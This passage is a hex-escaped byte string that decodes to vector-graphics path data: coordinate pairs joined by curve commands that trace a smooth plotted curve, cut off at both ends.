\x32\x30\x32\x33\x32\x31\x39\x36\x32\x20\x30\x2e\x39\x34\x34\x34\
\x37\x31\x37\x36\x30\x38\x35\x31\x20\x31\x34\x2e\x36\x34\x36\x38\
\x37\x34\x31\x36\x34\x33\x20\x30\x2e\x39\x35\x30\x37\x31\x32\x38\
\x32\x39\x36\x38\x37\x20\x31\x34\x2e\x36\x37\x32\x38\x36\x38\x32\
\x34\x34\x39\x20\x43\x20\x30\x2e\x39\x35\x36\x39\x35\x33\x38\x39\
\x38\x35\x32\x33\x20\x31\x34\x2e\x36\x39\x38\x38\x36\x32\x33\x32\
\x35\x35\x20\x30\x2e\x39\x36\x33\x31\x39\x34\x39\x36\x37\x33\x35\
\x39\x20\x31\x34\x2e\x37\x32\x34\x32\x30\x34\x36\x31\x39\x33\x20\
\x30\x2e\x39\x36\x39\x34\x33\x36\x30\x33\x36\x31\x39\x35\x20\x31\
\x34\x2e\x37\x34\x38\x38\x37\x39\x34\x39\x37\x34\x20\x43\x20\x30\
\x2e\x39\x37\x35\x36\x37\x37\x31\x30\x35\x30\x33\x31\x20\x31\x34\
\x2e\x37\x37\x33\x35\x35\x34\x33\x37\x35\x35\x20\x30\x2e\x39\x38\
\x31\x39\x31\x38\x31\x37\x33\x38\x36\x37\x20\x31\x34\x2e\x37\x39\
\x37\x35\x35\x37\x38\x32\x31\x32\x20\x30\x2e\x39\x38\x38\x31\x35\
\x39\x32\x34\x32\x37\x30\x33\x20\x31\x34\x2e\x38\x32\x30\x38\x37\
\x35\x33\x35\x34\x37\x20\x43\x20\x30\x2e\x39\x39\x34\x34\x30\x30\
\x33\x31\x31\x35\x34\x20\x31\x34\x2e\x38\x34\x34\x31\x39\x32\x38\
\x38\x38\x32\x20\x31\x2e\x30\x30\x30\x36\x34\x31\x33\x38\x30\x33\
\x38\x20\x31\x34\x2e\x38\x36\x36\x38\x32\x30\x33\x38\x31\x36\x20\
\x31\x2e\x30\x30\x36\x38\x38\x32\x34\x34\x39\x32\x31\x20\x31\x34\
\x2e\x38\x38\x38\x37\x34\x34\x35\x32\x36\x34\x20\x43\x20\x31\x2e\
\x30\x31\x33\x31\x32\x33\x35\x31\x38\x30\x35\x20\x31\x34\x2e\x39\
\x31\x30\x36\x36\x38\x36\x37\x31\x33\x20\x31\x2e\x30\x31\x39\x33\
\x36\x34\x35\x38\x36\x38\x38\x20\x31\x34\x2e\x39\x33\x31\x38\x38\
\x35\x32\x33\x35\x20\x31\x2e\x30\x32\x35\x36\x30\x35\x36\x35\x35\
\x37\x32\x20\x31\x34\x2e\x39\x35\x32\x33\x38\x32\x31\x30\x31\x31\
\x20\x43\x20\x31\x2e\x30\x33\x31\x38\x34\x36\x37\x32\x34\x35\x36\
\x20\x31\x34\x2e\x39\x37\x32\x38\x37\x38\x39\x36\x37\x33\x20\x31\
\x2e\x30\x33\x38\x30\x38\x37\x37\x39\x33\x33\x39\x20\x31\x34\x2e\
\x39\x39\x32\x36\x35\x31\x38\x30\x35\x20\x31\x2e\x30\x34\x34\x33\
\x32\x38\x38\x36\x32\x32\x33\x20\x31\x35\x2e\x30\x31\x31\x36\x38\
\x39\x37\x30\x38\x36\x20\x43\x20\x31\x2e\x30\x35\x30\x35\x36\x39\
\x39\x33\x31\x30\x36\x20\x31\x35\x2e\x30\x33\x30\x37\x32\x37\x36\
\x31\x32\x32\x20\x31\x2e\x30\x35\x36\x38\x31\x30\x39\x39\x39\x39\
\x20\x31\x35\x2e\x30\x34\x39\x30\x32\x36\x31\x35\x39\x31\x20\x31\
\x2e\x30\x36\x33\x30\x35\x32\x30\x36\x38\x37\x34\x20\x31\x35\x2e\
\x30\x36\x36\x35\x37\x35\x36\x37\x31\x36\x20\x43\x20\x31\x2e\x30\
\x36\x39\x32\x39\x33\x31\x33\x37\x35\x37\x20\x31\x35\x2e\x30\x38\
\x34\x31\x32\x35\x31\x38\x34\x31\x20\x31\x2e\x30\x37\x35\x35\x33\
\x34\x32\x30\x36\x34\x31\x20\x31\x35\x2e\x31\x30\x30\x39\x32\x31\
\x31\x35\x34\x37\x20\x31\x2e\x30\x38\x31\x37\x37\x35\x32\x37\x35\
\x32\x34\x20\x31\x35\x2e\x31\x31\x36\x39\x35\x35\x31\x34\x38\x32\
\x20\x43\x20\x31\x2e\x30\x38\x38\x30\x31\x36\x33\x34\x34\x30\x38\
\x20\x31\x35\x2e\x31\x33\x32\x39\x38\x39\x31\x34\x31\x37\x20\x31\
\x2e\x30\x39\x34\x32\x35\x37\x34\x31\x32\x39\x32\x20\x31\x35\x2e\
\x31\x34\x38\x32\x35\x36\x35\x37\x32\x39\x20\x31\x2e\x31\x30\x30\
\x34\x39\x38\x34\x38\x31\x37\x35\x20\x31\x35\x2e\x31\x36\x32\x37\
\x35\x30\x32\x36\x32\x33\x20\x43\x20\x31\x2e\x31\x30\x36\x37\x33\
\x39\x35\x35\x30\x35\x39\x20\x31\x35\x2e\x31\x37\x37\x32\x34\x33\
\x39\x35\x31\x36\x20\x31\x2e\x31\x31\x32\x39\x38\x30\x36\x31\x39\
\x34\x32\x20\x31\x35\x2e\x31\x39\x30\x39\x35\x39\x32\x34\x33\x33\
\x20\x31\x2e\x31\x31\x39\x32\x32\x31\x36\x38\x38\x32\x36\x20\x31\
\x35\x2e\x32\x30\x33\x38\x39\x30\x32\x32\x34\x32\x20\x43\x20\x31\
\x2e\x31\x32\x35\x34\x36\x32\x37\x35\x37\x31\x20\x31\x35\x2e\x32\
\x31\x36\x38\x32\x31\x32\x30\x35\x32\x20\x31\x2e\x31\x33\x31\x37\
\x30\x33\x38\x32\x35\x39\x33\x20\x31\x35\x2e\x32\x32\x38\x39\x36\
\x33\x31\x35\x36\x33\x20\x31\x2e\x31\x33\x37\x39\x34\x34\x38\x39\
\x34\x37\x37\x20\x31\x35\x2e\x32\x34\x30\x33\x31\x31\x34\x34\x30\
\x34\x20\x43\x20\x31\x2e\x31\x34\x34\x31\x38\x35\x39\x36\x33\x36\
\x20\x31\x35\x2e\x32\x35\x31\x36\x35\x39\x37\x32\x34\x34\x20\x31\
\x2e\x31\x35\x30\x34\x32\x37\x30\x33\x32\x34\x34\x20\x31\x35\x2e\
\x32\x36\x32\x32\x30\x39\x35\x36\x36\x31\x20\x31\x2e\x31\x35\x36\
\x36\x36\x38\x31\x30\x31\x32\x38\x20\x31\x35\x2e\x32\x37\x31\x39\
\x35\x37\x36\x31\x31\x32\x20\x43\x20\x31\x2e\x31\x36\x32\x39\x30\
\x39\x31\x37\x30\x31\x31\x20\x31\x35\x2e\x32\x38\x31\x37\x30\x35\
\x36\x35\x36\x33\x20\x31\x2e\x31\x36\x39\x31\x35\x30\x32\x33\x38\
\x39\x35\x20\x31\x35\x2e\x32\x39\x30\x36\x34\x37\x30\x38\x30\x37\
\x20\x31\x2e\x31\x37\x35\x33\x39\x31\x33\x30\x37\x37\x38\x20\x31\
\x35\x2e\x32\x39\x38\x37\x37\x39\x38\x31\x38\x34\x20\x43\x20\x31\
\x2e\x31\x38\x31\x36\x33\x32\x33\x37\x36\x36\x32\x20\x31\x35\x2e\
\x33\x30\x36\x39\x31\x32\x35\x35\x36\x31\x20\x31\x2e\x31\x38\x37\
\x38\x37\x33\x34\x34\x35\x34\x36\x20\x31\x35\x2e\x33\x31\x34\x32\
\x33\x31\x37\x34\x31\x37\x20\x31\x2e\x31\x39\x34\x31\x31\x34\x35\
\x31\x34\x32\x39\x20\x31\x35\x2e\x33\x32\x30\x37\x33\x36\x36\x30\
\x30\x35\x20\x43\x20\x31\x2e\x32\x30\x30\x33\x35\x35\x35\x38\x33\
\x31\x33\x20\x31\x35\x2e\x33\x32\x37\x32\x34\x31\x34\x35\x39\x34\
\x20\x31\x2e\x32\x30\x36\x35\x39\x36\x36\x35\x31\x39\x37\x20\x31\
\x35\x2e\x33\x33\x32\x39\x32\x37\x30\x39\x32\x32\x20\x31\x2e\x32\
\x31\x32\x38\x33\x37\x37\x32\x30\x38\x20\x31\x35\x2e\x33\x33\x37\
\x37\x39\x34\x30\x31\x37\x20\x43\x20\x31\x2e\x32\x31\x39\x30\x37\
\x38\x37\x38\x39\x36\x34\x20\x31\x35\x2e\x33\x34\x32\x36\x36\x30\
\x39\x34\x31\x38\x20\x31\x2e\x32\x32\x35\x33\x31\x39\x38\x35\x38\
\x34\x37\x20\x31\x35\x2e\x33\x34\x36\x37\x30\x34\x32\x33\x33\x31\
\x20\x31\x2e\x32\x33\x31\x35\x36\x30\x39\x32\x37\x33\x31\x20\x31\
\x35\x2e\x33\x34\x39\x39\x32\x35\x37\x30\x30\x36\x20\x43\x20\x31\
\x2e\x32\x33\x37\x38\x30\x31\x39\x39\x36\x31\x35\x20\x31\x35\x2e\
\x33\x35\x33\x31\x34\x37\x31\x36\x38\x31\x20\x31\x2e\x32\x34\x34\
\x30\x34\x33\x30\x36\x34\x39\x38\x20\x31\x35\x2e\x33\x35\x35\x35\
\x34\x31\x38\x36\x37\x38\x20\x31\x2e\x32\x35\x30\x32\x38\x34\x31\
\x33\x33\x38\x32\x20\x31\x35\x2e\x33\x35\x37\x31\x31\x32\x38\x39\
\x38\x34\x20\x43\x20\x31\x2e\x32\x35\x36\x35\x32\x35\x32\x30\x32\
\x36\x35\x20\x31\x35\x2e\x33\x35\x38\x36\x38\x33\x39\x32\x38\x39\
\x20\x31\x2e\x32\x36\x32\x37\x36\x36\x32\x37\x31\x34\x39\x20\x31\
\x35\x2e\x33\x35\x39\x34\x32\x36\x33\x33\x35\x33\x20\x31\x2e\x32\
\x36\x39\x30\x30\x37\x33\x34\x30\x33\x33\x20\x31\x35\x2e\x33\x35\
\x39\x33\x34\x34\x35\x30\x30\x34\x20\x43\x20\x31\x2e\x32\x37\x35\
\x32\x34\x38\x34\x30\x39\x31\x36\x20\x31\x35\x2e\x33\x35\x39\x32\
\x36\x32\x36\x36\x35\x35\x20\x31\x2e\x32\x38\x31\x34\x38\x39\x34\
\x37\x38\x20\x31\x35\x2e\x33\x35\x38\x33\x35\x31\x36\x33\x30\x39\
\x20\x31\x2e\x32\x38\x37\x37\x33\x30\x35\x34\x36\x38\x33\x20\x31\
\x35\x2e\x33\x35\x36\x36\x31\x37\x30\x35\x37\x31\x20\x43\x20\x31\
\x2e\x32\x39\x33\x39\x37\x31\x36\x31\x35\x36\x37\x20\x31\x35\x2e\
\x33\x35\x34\x38\x38\x32\x34\x38\x33\x32\x20\x31\x2e\x33\x30\x30\
\x32\x31\x32\x36\x38\x34\x35\x31\x20\x31\x35\x2e\x33\x35\x32\x33\
\x31\x39\x34\x31\x36\x20\x31\x2e\x33\x30\x36\x34\x35\x33\x37\x35\
\x33\x33\x34\x20\x31\x35\x2e\x33\x34\x38\x39\x33\x34\x37\x38\x34\
\x35\x20\x43\x20\x31\x2e\x33\x31\x32\x36\x39\x34\x38\x32\x32\x31\
\x38\x20\x31\x35\x2e\x33\x34\x35\x35\x35\x30\x31\x35\x33\x20\x31\
\x2e\x33\x31\x38\x39\x33\x35\x38\x39\x31\x30\x31\x20\x31\x35\x2e\
\x33\x34\x31\x33\x33\x39\x30\x31\x35\x31\x20\x31\x2e\x33\x32\x35\
\x31\x37\x36\x39\x35\x39\x38\x35\x20\x31\x35\x2e\x33\x33\x36\x33\
\x30\x39\x35\x35\x37\x38\x20\x43\x20\x31\x2e\x33\x33\x31\x34\x31\
\x38\x30\x32\x38\x36\x39\x20\x31\x35\x2e\x33\x33\x31\x32\x38\x30\
\x31\x30\x30\x35\x20\x31\x2e\x33\x33\x37\x36\x35\x39\x30\x39\x37\
\x35\x32\x20\x31\x35\x2e\x33\x32\x35\x34\x32\x37\x34\x30\x31\x35\
\x20\x31\x2e\x33\x34\x33\x39\x30\x30\x31\x36\x36\x33\x36\x20\x31\
\x35\x2e\x33\x31\x38\x37\x36\x30\x38\x39\x33\x20\x43\x20\x31\x2e\
\x33\x35\x30\x31\x34\x31\x32\x33\x35\x31\x39\x20\x31\x35\x2e\x33\
\x31\x32\x30\x39\x34\x33\x38\x34\x34\x20\x31\x2e\x33\x35\x36\x33\
\x38\x32\x33\x30\x34\x30\x33\x20\x31\x35\x2e\x33\x30\x34\x36\x30\
\x39\x31\x37\x31\x33\x20\x31\x2e\x33\x36\x32\x36\x32\x33\x33\x37\
\x32\x38\x37\x20\x31\x35\x2e\x32\x39\x36\x33\x31\x35\x39\x31\x36\
\x35\x20\x43\x20\x31\x2e\x33\x36\x38\x38\x36\x34\x34\x34\x31\x37\
\x20\x31\x35\x2e\x32\x38\x38\x30\x32\x32\x36\x36\x31\x37\x20\x31\
\x2e\x33\x37\x35\x31\x30\x35\x35\x31\x30\x35\x34\x20\x31\x35\x2e\
\x32\x37\x38\x39\x31\x36\x35\x30\x35\x20\x31\x2e\x33\x38\x31\x33\
\x34\x36\x35\x37\x39\x33\x37\x20\x31\x35\x2e\x32\x36\x39\x30\x30\
\x39\x33\x32\x33\x36\x20\x43\x20\x31\x2e\x33\x38\x37\x35\x38\x37\
\x36\x34\x38\x32\x31\x20\x31\x35\x2e\x32\x35\x39\x31\x30\x32\x31\
\x34\x32\x32\x20\x31\x2e\x33\x39\x33\x38\x32\x38\x37\x31\x37\x30\
\x35\x20\x31\x35\x2e\x32\x34\x38\x33\x38\x39\x31\x31\x38\x31\x20\
\x31\x2e\x34\x30\x30\x30\x36\x39\x37\x38\x35\x38\x38\x20\x31\x35\
\x2e\x32\x33\x36\x38\x38\x33\x33\x32\x34\x35\x20\x43\x20\x31\x2e\
\x34\x30\x36\x33\x31\x30\x38\x35\x34\x37\x32\x20\x31\x35\x2e\x32\
\x32\x35\x33\x37\x37\x35\x33\x30\x38\x20\x31\x2e\x34\x31\x32\x35\
\x35\x31\x39\x32\x33\x35\x35\x20\x31\x35\x2e\x32\x31\x33\x30\x37\
\x34\x31\x39\x39\x35\x20\x31\x2e\x34\x31\x38\x37\x39\x32\x39\x39\
\x32\x33\x39\x20\x31\x35\x2e\x31\x39\x39\x39\x38\x37\x35\x37\x39\
\x32\x20\x43\x20\x31\x2e\x34\x32\x35\x30\x33\x34\x30\x36\x31\x32\
\x33\x20\x31\x35\x2e\x31\x38\x36\x39\x30\x30\x39\x35\x38\x39\x20\
\x31\x2e\x34\x33\x31\x32\x37\x35\x31\x33\x30\x30\x36\x20\x31\x35\
\x2e\x31\x37\x33\x30\x32\x36\x33\x33\x38\x36\x20\x31\x2e\x34\x33\
\x37\x35\x31\x36\x31\x39\x38\x39\x20\x31\x35\x2e\x31\x35\x38\x33\
\x37\x39\x31\x32\x30\x37\x20\x43\x20\x31\x2e\x34\x34\x33\x37\x35\
\x37\x32\x36\x37\x37\x33\x20\x31\x35\x2e\x31\x34\x33\x37\x33\x31\
\x39\x30\x32\x39\x20\x31\x2e\x34\x34\x39\x39\x39\x38\x33\x33\x36\
\x35\x37\x20\x31\x35\x2e\x31\x32\x38\x33\x30\x37\x34\x34\x30\x39\
\x20\x31\x2e\x34\x35\x36\x32\x33\x39\x34\x30\x35\x34\x31\x20\x31\
\x35\x2e\x31\x31\x32\x31\x32\x32\x32\x36\x37\x31\x20\x43\x20\x31\
\x2e\x34\x36\x32\x34\x38\x30\x34\x37\x34\x32\x34\x20\x31\x35\x2e\
\x30\x39\x35\x39\x33\x37\x30\x39\x33\x32\x20\x31\x2e\x34\x36\x38\
\x37\x32\x31\x35\x34\x33\x30\x38\x20\x31\x35\x2e\x30\x37\x38\x39\
\x38\x36\x36\x33\x32\x35\x20\x31\x2e\x34\x37\x34\x39\x36\x32\x36\
\x31\x31\x39\x31\x20\x31\x35\x2e\x30\x36\x31\x32\x38\x38\x35\x32\
\x31\x35\x20\x43\x20\x31\x2e\x34\x38\x31\x32\x30\x33\x36\x38\x30\
\x37\x35\x20\x31\x35\x2e\x30\x34\x33\x35\x39\x30\x34\x31\x30\x35\
\x20\x31\x2e\x34\x38\x37\x34\x34\x34\x37\x34\x39\x35\x39\x20\x31\
\x35\x2e\x30\x32\x35\x31\x34\x30\x31\x35\x32\x39\x20\x31\x2e\x34\
\x39\x33\x36\x38\x35\x38\x31\x38\x34\x32\x20\x31\x35\x2e\x30\x30\
\x35\x39\x35\x36\x34\x36\x32\x33\x20\x43\x20\x31\x2e\x34\x39\x39\
\x39\x32\x36\x38\x38\x37\x32\x36\x20\x31\x34\x2e\x39\x38\x36\x37\
\x37\x32\x37\x37\x31\x36\x20\x31\x2e\x35\x30\x36\x31\x36\x37\x39\
\x35\x36\x31\x20\x31\x34\x2e\x39\x36\x36\x38\x35\x31\x32\x33\x37\
\x33\x20\x31\x2e\x35\x31\x32\x34\x30\x39\x30\x32\x34\x39\x33\x20\
\x31\x34\x2e\x39\x34\x36\x32\x31\x31\x36\x32\x31\x31\x20\x43\x20\
\x31\x2e\x35\x31\x38\x36\x35\x30\x30\x39\x33\x37\x37\x20\x31\x34\
\x2e\x39\x32\x35\x35\x37\x32\x30\x30\x34\x38\x20\x31\x2e\x35\x32\
\x34\x38\x39\x31\x31\x36\x32\x36\x20\x31\x34\x2e\x39\x30\x34\x32\
\x30\x39\x39\x38\x38\x33\x20\x31\x2e\x35\x33\x31\x31\x33\x32\x32\
\x33\x31\x34\x34\x20\x31\x34\x2e\x38\x38\x32\x31\x34\x36\x33\x35\
\x30\x39\x20\x43\x20\x31\x2e\x35\x33\x37\x33\x37\x33\x33\x30\x30\
\x32\x38\x20\x31\x34\x2e\x38\x36\x30\x30\x38\x32\x37\x31\x33\x34\
\x20\x31\x2e\x35\x34\x33\x36\x31\x34\x33\x36\x39\x31\x31\x20\x31\
\x34\x2e\x38\x33\x37\x33\x31\x33\x32\x33\x35\x39\x20\x31\x2e\x35\
\x34\x39\x38\x35\x35\x34\x33\x37\x39\x35\x20\x31\x34\x2e\x38\x31\
\x33\x38\x35\x39\x36\x38\x33\x20\x43\x20\x31\x2e\x35\x35\x36\x30\
\x39\x36\x35\x30\x36\x37\x38\x20\x31\x34\x2e\x37\x39\x30\x34\x30\
\x36\x31\x33\x30\x31\x20\x31\x2e\x35\x36\x32\x33\x33\x37\x35\x37\
\x35\x36\x32\x20\x31\x34\x2e\x37\x36\x36\x32\x36\x34\x33\x38\x38\
\x34\x20\x31\x2e\x35\x36\x38\x35\x37\x38\x36\x34\x34\x34\x36\x20\
\x31\x34\x2e\x37\x34\x31\x34\x35\x37\x31\x37\x34\x33\x20\x43\x20\
\x31\x2e\x35\x37\x34\x38\x31\x39\x37\x31\x33\x32\x39\x20\x31\x34\
\x2e\x37\x31\x36\x36\x34\x39\x39\x36\x30\x32\x20\x31\x2e\x35\x38\
\x31\x30\x36\x30\x37\x38\x32\x31\x33\x20\x31\x34\x2e\x36\x39\x31\
\x31\x37\x33\x32\x37\x32\x33\x20\x31\x2e\x35\x38\x37\x33\x30\x31\
\x38\x35\x30\x39\x36\x20\x31\x34\x2e\x36\x36\x35\x30\x35\x30\x37\
\x34\x33\x37\x20\x43\x20\x31\x2e\x35\x39\x33\x35\x34\x32\x39\x31\
\x39\x38\x20\x31\x34\x2e\x36\x33\x38\x39\x32\x38\x32\x31\x35\x32\
\x20\x31\x2e\x35\x39\x39\x37\x38\x33\x39\x38\x38\x36\x34\x20\x31\
\x34\x2e\x36\x31\x32\x31\x35\x35\x39\x36\x32\x37\x20\x31\x2e\x36\
\x30\x36\x30\x32\x35\x30\x35\x37\x34\x37\x20\x31\x34\x2e\x35\x38\
\x34\x37\x35\x38\x34\x39\x39\x35\x20\x43\x20\x31\x2e\x36\x31\x32\
\x32\x36\x36\x31\x32\x36\x33\x31\x20\x31\x34\x2e\x35\x35\x37\x33\
\x36\x31\x30\x33\x36\x34\x20\x31\x2e\x36\x31\x38\x35\x30\x37\x31\
\x39\x35\x31\x34\x20\x31\x34\x2e\x35\x32\x39\x33\x33\x34\x36\x30\
\x33\x36\x20\x31\x2e\x36\x32\x34\x37\x34\x38\x32\x36\x33\x39\x38\
\x20\x31\x34\x2e\x35\x30\x30\x37\x30\x34\x35\x35\x36\x36\x20\x43\
\x20\x31\x2e\x36\x33\x30\x39\x38\x39\x33\x33\x32\x38\x32\x20\x31\
\x34\x2e\x34\x37\x32\x30\x37\x34\x35\x30\x39\x36\x20\x31\x2e\x36\
\x33\x37\x32\x33\x30\x34\x30\x31\x36\x35\x20\x31\x34\x2e\x34\x34\
\x32\x38\x33\x37\x32\x31\x39\x34\x20\x31\x2e\x36\x34\x33\x34\x37\
\x31\x34\x37\x30\x34\x39\x20\x31\x34\x2e\x34\x31\x33\x30\x31\x38\
\x38\x34\x34\x36\x20\x43\x20\x31\x2e\x36\x34\x39\x37\x31\x32\x35\
\x33\x39\x33\x32\x20\x31\x34\x2e\x33\x38\x33\x32\x30\x30\x34\x36\
\x39\x38\x20\x31\x2e\x36\x35\x35\x39\x35\x33\x36\x30\x38\x31\x36\
\x20\x31\x34\x2e\x33\x35\x32\x37\x39\x37\x35\x31\x36\x39\x20\x31\
\x2e\x36\x36\x32\x31\x39\x34\x36\x37\x37\x20\x31\x34\x2e\x33\x32\
\x31\x38\x33\x36\x39\x30\x37\x31\x20\x43\x20\x31\x2e\x36\x36\x38\
\x34\x33\x35\x37\x34\x35\x38\x33\x20\x31\x34\x2e\x32\x39\x30\x38\
\x37\x36\x32\x39\x37\x34\x20\x31\x2e\x36\x37\x34\x36\x37\x36\x38\
\x31\x34\x36\x37\x20\x31\x34\x2e\x32\x35\x39\x33\x35\x34\x36\x37\
\x38\x33\x20\x31\x2e\x36\x38\x30\x39\x31\x37\x38\x38\x33\x35\x20\
\x31\x34\x2e\x32\x32\x37\x32\x39\x39\x36\x39\x32\x32\x20\x43\x20\
\x31\x2e\x36\x38\x37\x31\x35\x38\x39\x35\x32\x33\x34\x20\x31\x34\
\x2e\x31\x39\x35\x32\x34\x34\x37\x30\x36\x31\x20\x31\x2e\x36\x39\
\x33\x34\x30\x30\x30\x32\x31\x31\x38\x20\x31\x34\x2e\x31\x36\x32\
\x36\x35\x33\x31\x34\x36\x37\x20\x31\x2e\x36\x39\x39\x36\x34\x31\
\x30\x39\x30\x30\x31\x20\x31\x34\x2e\x31\x32\x39\x35\x35\x33\x33\
\x33\x34\x35\x20\x43\x20\x31\x2e\x37\x30\x35\x38\x38\x32\x31\x35\
\x38\x38\x35\x20\x31\x34\x2e\x30\x39\x36\x34\x35\x33\x35\x32\x32\
\x33\x20\x31\x2e\x37\x31\x32\x31\x32\x33\x32\x32\x37\x36\x38\x20\
\x31\x34\x2e\x30\x36\x32\x38\x34\x32\x34\x30\x32\x32\x20\x31\x2e\
\x37\x31\x38\x33\x36\x34\x32\x39\x36\x35\x32\x20\x31\x34\x2e\x30\
\x32\x38\x37\x34\x38\x39\x32\x39\x32\x20\x43\x20\x31\x2e\x37\x32\
\x34\x36\x30\x35\x33\x36\x35\x33\x36\x20\x31\x33\x2e\x39\x39\x34\
\x36\x35\x35\x34\x35\x36\x32\x20\x31\x2e\x37\x33\x30\x38\x34\x36\
\x34\x33\x34\x31\x39\x20\x31\x33\x2e\x39\x36\x30\x30\x37\x36\x37\
\x33\x31\x31\x20\x31\x2e\x37\x33\x37\x30\x38\x37\x35\x30\x33\x30\
\x33\x20\x31\x33\x2e\x39\x32\x35\x30\x34\x32\x32\x39\x38\x37\x20\
\x43\x20\x31\x2e\x37\x34\x33\x33\x32\x38\x35\x37\x31\x38\x36\x20\
\x31\x33\x2e\x38\x39\x30\x30\x30\x37\x38\x36\x36\x32\x20\x31\x2e\
\x37\x34\x39\x35\x36\x39\x36\x34\x30\x37\x20\x31\x33\x2e\x38\x35\
\x34\x35\x31\x34\x39\x38\x37\x36\x20\x31\x2e\x37\x35\x35\x38\x31\
\x30\x37\x30\x39\x35\x34\x20\x31\x33\x2e\x38\x31\x38\x35\x39\x33\
\x37\x35\x31\x35\x20\x43\x20\x31\x2e\x37\x36\x32\x30\x35\x31\x37\
\x37\x38\x33\x37\x20\x31\x33\x2e\x37\x38\x32\x36\x37\x32\x35\x31\
\x35\x35\x20\x31\x2e\x37\x36\x38\x32\x39\x32\x38\x34\x37\x32\x31\
\x20\x31\x33\x2e\x37\x34\x36\x33\x32\x30\x33\x34\x37\x37\x20\x31\
\x2e\x37\x37\x34\x35\x33\x33\x39\x31\x36\x30\x35\x20\x31\x33\x2e\
\x37\x30\x39\x35\x36\x37\x38\x33\x34\x37\x20\x43\x20\x31\x2e\x37\
\x38\x30\x37\x37\x34\x39\x38\x34\x38\x38\x20\x31\x33\x2e\x36\x37\
\x32\x38\x31\x35\x33\x32\x31\x37\x20\x31\x2e\x37\x38\x37\x30\x31\
\x36\x30\x35\x33\x37\x32\x20\x31\x33\x2e\x36\x33\x35\x36\x36\x30\
\x30\x35\x37\x37\x20\x31\x2e\x37\x39\x33\x32\x35\x37\x31\x32\x32\
\x35\x35\x20\x31\x33\x2e\x35\x39\x38\x31\x33\x33\x30\x37\x39\x33\
\x20\x43\x20\x31\x2e\x37\x39\x39\x34\x39\x38\x31\x39\x31\x33\x39\
\x20\x31\x33\x2e\x35\x36\x30\x36\x30\x36\x31\x30\x31\x20\x31\x2e\
\x38\x30\x35\x37\x33\x39\x32\x36\x30\x32\x33\x20\x31\x33\x2e\x35\
\x32\x32\x37\x30\x35\x31\x37\x34\x39\x20\x31\x2e\x38\x31\x31\x39\
\x38\x30\x33\x32\x39\x30\x36\x20\x31\x33\x2e\x34\x38\x34\x34\x36\
\x31\x37\x34\x20\x43\x20\x31\x2e\x38\x31\x38\x32\x32\x31\x33\x39\
\x37\x39\x20\x31\x33\x2e\x34\x34\x36\x32\x31\x38\x33\x30\x35\x31\
\x20\x31\x2e\x38\x32\x34\x34\x36\x32\x34\x36\x36\x37\x33\x20\x31\
\x33\x2e\x34\x30\x37\x36\x33\x30\x33\x30\x33\x38\x20\x31\x2e\x38\
\x33\x30\x37\x30\x33\x35\x33\x35\x35\x37\x20\x31\x33\x2e\x33\x36\
\x38\x37\x32\x39\x35\x32\x38\x36\x20\x43\x20\x31\x2e\x38\x33\x36\
\x39\x34\x34\x36\x30\x34\x34\x31\x20\x31\x33\x2e\x33\x32\x39\x38\
\x32\x38\x37\x35\x33\x35\x20\x31\x2e\x38\x34\x33\x31\x38\x35\x36\
\x37\x33\x32\x34\x20\x31\x33\x2e\x32\x39\x30\x36\x31\x33\x33\x32\
\x35\x38\x20\x31\x2e\x38\x34\x39\x34\x32\x36\x37\x34\x32\x30\x38\
\x20\x31\x33\x2e\x32\x35\x31\x31\x31\x35\x33\x34\x32\x38\x20\x43\
\x20\x31\x2e\x38\x35\x35\x36\x36\x37\x38\x31\x30\x39\x31\x20\x31\
\x33\x2e\x32\x31\x31\x36\x31\x37\x33\x35\x39\x38\x20\x31\x2e\x38\
\x36\x31\x39\x30\x38\x38\x37\x39\x37\x35\x20\x31\x33\x2e\x31\x37\
\x31\x38\x33\x35\x31\x32\x34\x36\x20\x31\x2e\x38\x36\x38\x31\x34\
\x39\x39\x34\x38\x35\x39\x20\x31\x33\x2e\x31\x33\x31\x38\x30\x30\
\x39\x38\x39\x33\x20\x43\x20\x31\x2e\x38\x37\x34\x33\x39\x31\x30\
\x31\x37\x34\x32\x20\x31\x33\x2e\x30\x39\x31\x37\x36\x36\x38\x35\
\x33\x39\x20\x31\x2e\x38\x38\x30\x36\x33\x32\x30\x38\x36\x32\x36\
\x20\x31\x33\x2e\x30\x35\x31\x34\x37\x39\x33\x30\x36\x31\x20\x31\
\x2e\x38\x38\x36\x38\x37\x33\x31\x35\x35\x30\x39\x20\x31\x33\x2e\
\x30\x31\x30\x39\x37\x30\x39\x30\x32\x38\x20\x43\x20\x31\x2e\x38\
\x39\x33\x31\x31\x34\x32\x32\x33\x39\x33\x20\x31\x32\x2e\x39\x37\
\x30\x34\x36\x32\x34\x39\x39\x35\x20\x31\x2e\x38\x39\x39\x33\x35\
\x35\x32\x39\x32\x37\x37\x20\x31\x32\x2e\x39\x32\x39\x37\x33\x31\
\x39\x31\x35\x32\x20\x31\x2e\x39\x30\x35\x35\x39\x36\x33\x36\x31\
\x36\x20\x31\x32\x2e\x38\x38\x38\x38\x31\x31\x38\x36\x31\x33\x20\
\x43\x20\x31\x2e\x39\x31\x31\x38\x33\x37\x34\x33\x30\x34\x34\x20\
\x31\x32\x2e\x38\x34\x37\x38\x39\x31\x38\x30\x37\x35\x20\x31\x2e\
\x39\x31\x38\x30\x37\x38\x34\x39\x39\x32\x37\x20\x31\x32\x2e\x38\
\x30\x36\x37\x38\x31\x31\x34\x37\x35\x20\x31\x2e\x39\x32\x34\x33\
\x31\x39\x35\x36\x38\x31\x31\x20\x31\x32\x2e\x37\x36\x35\x35\x31\
\x32\x36\x39\x36\x39\x20\x43\x20\x31\x2e\x39\x33\x30\x35\x36\x30\
\x36\x33\x36\x39\x35\x20\x31\x32\x2e\x37\x32\x34\x32\x34\x34\x32\
\x34\x36\x33\x20\x31\x2e\x39\x33\x36\x38\x30\x31\x37\x30\x35\x37\
\x38\x20\x31\x32\x2e\x36\x38\x32\x38\x31\x37\x30\x35\x39\x20\x31\
\x2e\x39\x34\x33\x30\x34\x32\x37\x37\x34\x36\x32\x20\x31\x32\x2e\
\x36\x34\x31\x32\x36\x34\x30\x30\x34\x20\x43\x20\x31\x2e\x39\x34\
\x39\x32\x38\x33\x38\x34\x33\x34\x35\x20\x31\x32\x2e\x35\x39\x39\
\x37\x31\x30\x39\x34\x39\x20\x31\x2e\x39\x35\x35\x35\x32\x34\x39\
\x31\x32\x32\x39\x20\x31\x32\x2e\x35\x35\x38\x30\x33\x31\x32\x37\
\x32\x31\x20\x31\x2e\x39\x36\x31\x37\x36\x35\x39\x38\x31\x31\x33\
\x20\x31\x32\x2e\x35\x31\x36\x32\x35\x37\x38\x34\x34\x39\x20\x43\
